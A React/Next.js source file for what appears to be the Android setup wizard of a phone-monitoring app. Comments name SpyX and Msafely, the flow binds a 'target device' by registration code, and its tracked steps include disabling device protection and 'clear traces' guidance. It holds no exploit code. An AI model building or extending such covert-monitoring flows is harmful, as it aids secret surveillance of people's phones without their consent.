import React, { cache, Fragment, useEffect, useState } from 'react'
import One from 'src/components/android-step/one'
import Two from 'src/components/android-step/two'
import Three from 'src/components/android-step/three'
import Four from 'src/components/android-step/four'
import Five from 'src/components/android-step/five'
import Six from 'src/components/android-step/six'
import Seven from 'src/components/android-step/seven'
import Eight from 'src/components/android-step/eight'
import PermissionDescription from 'src/components/android-step/PermissionDescription'

// ** Icon Imports
import Icon from 'src/@core/components/icon'
import { useTranslation } from 'src/utils/i18n'
import { useRouter } from 'next/router'
import { CheckCode, getCode } from 'src/@api/android'
import { getNotBindOrder } from 'src/@api/login'
import Backdrop from '@mui/material/Backdrop'
import CircularProgress from '@mui/material/CircularProgress'
import NewProgress1 from 'src/components/android-step/newProgress1'
import NewProgress2 from 'src/components/android-step/newProgress2'
import NewProgress3 from 'src/components/android-step/newProgress3'
import NewProgress4 from 'src/components/android-step/newProgress4'
import NewFooter from 'src/components/android-step/newFooter'
import Ready from 'src/components/android-step/ready'
import resolveCurrentOrderId, { guardAppSetupOrderId } from 'src/utils/resolveCurrentOrderId'
import { redirectIfShouldBuyPackage } from 'src/utils/chooseDeviceRedirect'
import { refreshSidebarDevices } from 'src/utils/refreshSidebarDevices'

function Index() {
  const left = '<'
  const right = '>'
  const { t } = useTranslation('commonAndroid')
  const [setupBlocked, setSetupBlocked] = useState(true)

  //移动端全屏
  const [fullScreen, setFullScreen] = useState(false)

  //记录当前步骤
  const [ID, setID] = useState(1)

  const router = useRouter()

  //验证码
  const [Code, setCode] = useState('')

  //蒙版
  const [Open, setOpen] = useState(false)

  //弹窗
  const [modalOpen, setModalOpen] = useState(false)
  const [modalText, setModalText] = useState(false)

  const [clickCount, setClickCount] = useState(0)
  const [isDisabled, setIsDisabled] = useState(false)

  const [text, setText] = useState(
    t('Target device binding was not successful Please enter the registration code on the target device')
  )

  // 当前页面
  const [nowPage, setNowPage] = useState(0)

  useEffect(() => {
    if (clickCount === 3) {
      setIsDisabled(true)

      const timer = setTimeout(() => {
        setClickCount(0)
        setModalOpen(false)
      }, 15000) //15秒后清除限制

      return () => clearTimeout(timer)
    }
  }, [clickCount])

  const closeModal = () => {
    setModalOpen(false)
    setModalText(false)
  }

  //注册码
  useEffect(() => {
    if (!router.isReady) return

    let active = true
    const GetCode = async () => {
      try {
        const orderId = await resolveCurrentOrderId()
        const result = orderId ? await getCode({ params: { id: orderId } }) : await getCode()
        if (active) setCode(result.data)
      } catch (err) {
        console.log(err, 'CodeErr')
      }
    }

    GetCode()

    return () => {
      active = false
    }
  }, [router.asPath, router.isReady])

  const NextHandler = async () => {
    if (ID !== 4) {
      setID(ID + 1)
    } else {
      //到达第三步
      //点击小于三次
      if (clickCount < 3) {
        setClickCount(clickCount + 1)
        setOpen(!Open)

        const res = await CheckCode({
          code: Code
        })
        try {
          if (res.userDevice) {
            setID(ID + 1)

            // 绑定成功后刷新侧栏设备列表（SpyX 版没有这一步，Msafely 保留）
            refreshSidebarDevices()
          } else {
            setText(
              t('Target device binding was not successful (Please enter the registration code on the target device.)')
            )
            setModalOpen(true)
            setTimeout(() => {
              setModalOpen(false)
            }, 5000)
          }
          setOpen(false)
        } catch (err) {
          console.log(err, 'checkCodeErr')
        }
      } else {
        //操作频繁
        setText(t('Frequent operations, try again after 15 seconds'))
        setModalOpen(true)
      }
    }
  }

  const startMonitoring = async () => {
    if (nowPage === 12) {
      bindTracking("startMonitoring")
    }

    if (clickCount < 3) {
      setClickCount(clickCount + 1)
      setOpen(!Open)

      const res = await CheckCode({
        code: Code
      })
      try {
        if (res.userDevice) {
          setNowPage(nowPage + 1)
          bindTracking("clearTracesGuideView")
        } else {
          setText(
            t('Please complete the final step in the app by entering the registration code')
          )
          setModalOpen(true)
          setModalText(true)
          setTimeout(() => {
            setModalOpen(false)
            setModalText(false)
          }, 5000)
        }
        setOpen(false)
      } catch (err) {
        console.log(err, 'checkCodeErr')
      }
    } else {
      //操作频繁
      setText(t('Frequent operations try again after 15 seconds'))
      setModalOpen(true)
    }
  }

  // 选择的手机品牌
  const [phoneType, setPhoneType] = useState('')

  // 埋点
  const bindTracking = async (type) => {
    const typeMap = {
      0: "webDisableProtectView",
      3: "downloadGuideView",
      12: "regCodeDisplayView",
      "startMonitoring": "regCodeNextClick",
      "clearTracesGuideView": "clearTracesGuideView"
    };
    const action = typeMap[type]
    if (action) {
    }
  }

  useEffect(() => {
    bindTracking(nowPage)
  }, [nowPage])

  const [isAgree, setIsAgree] = useState(false) // 是否显示绑定设备前的准备工作页面

  useEffect(() => {
    const guard = guardAppSetupOrderId(window.location.search)
    if (guard.blocked) {
      setSetupBlocked(true)

      return
    }
    setSetupBlocked(false)

    if (guard.orderId) return

    const init = async () => {
      const result = await getNotBindOrder()
      await redirectIfShouldBuyPackage(result)
    }
    init()
  }, [])

  if (setupBlocked) return null

  return (
    <Fragment>
      {/* // 新ui */}
      <div className={`max-w-[620px] lg:mx-auto !h-[calc(var(--vh2)*100-60px)] font-[Poppins] pt-[60px] Mlg:pt-4 ${nowPage > 12 ? 'max-w-full relative' : ''}`}>
        {isAgree && <Ready setIsAgree={setIsAgree} />}
        {isAgree || (
          <>
            {nowPage === 0 && <One fullScreen={fullScreen} setFullScreen={setFullScreen} />}
            {nowPage === 1 && <NewProgress1 setPhoneType={setPhoneType} setNowPage={setNowPage} />}
            {[2, 5].includes(nowPage) && <NewProgress2 nowPage={nowPage} />}
            {[3, 4].includes(nowPage) && <NewProgress3 nowPage={nowPage} />}
            {[6, 7, 8, 9, 10, 11, 12].includes(nowPage) && <NewProgress4 phoneType={phoneType} nowPage={nowPage} Code={Code} />}
            {nowPage === 13 && <Four fullScreen={fullScreen} setFullScreen={setFullScreen} Code={Code} nowPage={nowPage} setNowPage={setNowPage} startMonitoring={startMonitoring} />}

            {nowPage === 14 && <Five fullScreen={fullScreen} setFullScreen={setFullScreen} Code={Code} nowPage={nowPage} setNowPage={setNowPage} startMonitoring={startMonitoring} />}

            {nowPage === 15 && <Six fullScreen={fullScreen} setFullScreen={setFullScreen} Code={Code} nowPage={nowPage} setNowPage={setNowPage} startMonitoring={startMonitoring} />}

            {nowPage === 16 && <Seven fullScreen={fullScreen} setFullScreen={setFullScreen} Code={Code} nowPage={nowPage} setNowPage={setNowPage} startMonitoring={startMonitoring} />}

            {nowPage === 17 && <Eight fullScreen={fullScreen} setFullScreen={setFullScreen} Code={Code} nowPage={nowPage} setNowPage={setNowPage} startMonitoring={startMonitoring} />}
          </>
        )}
      </div>

      <Backdrop sx={{ color: '#fff', zIndex: theme => theme.zIndex.drawer + 1 }} open={modalOpen}>
        <div className='flex items-center justify-center'>
          {modalOpen && (
            <div className='w-[92%] fixed top-1/2 left-1/2 max-w-[480px] xs:max-w-[360px] transform -translate-x-1/2 -translate-y-1/2 bg-white shadow-4xl rounded-md'>
              <button onClick={() => closeModal(false)} className='flex justify-end absolute right-4 top-4'>
                <Icon icon='maki:cross' className='text-black/20 w-[20px] h-[20px]' />
              </button>
              <div className='px-[50px] py-[40px] flex flex-col items-center justify-center'>
                <Icon icon='material-symbols:error' className='text-red-600 w-[25px] h-[25px]' />
                {modalText && <p className='text-[20px] font-[600] text-black mt-4 w-full text-center'>{t('Device not connected successfully')}</p>}
                <p className='text-black text-center w-full mt-4 text-[16px]'>{text}</p>
              </div>
            </div>
          )}
        </div>
      </Backdrop>
      <Backdrop sx={{ color: '#fff', zIndex: theme => theme.zIndex.drawer + 1 }} open={Open}>
        <CircularProgress color='inherit' />
      </Backdrop>

      {isAgree || <NewFooter nowPage={nowPage} setNowPage={setNowPage} startMonitoring={startMonitoring} showFlag={nowPage > 12} setIsAgree={setIsAgree} />}
    </Fragment>
  )
}

export default Index
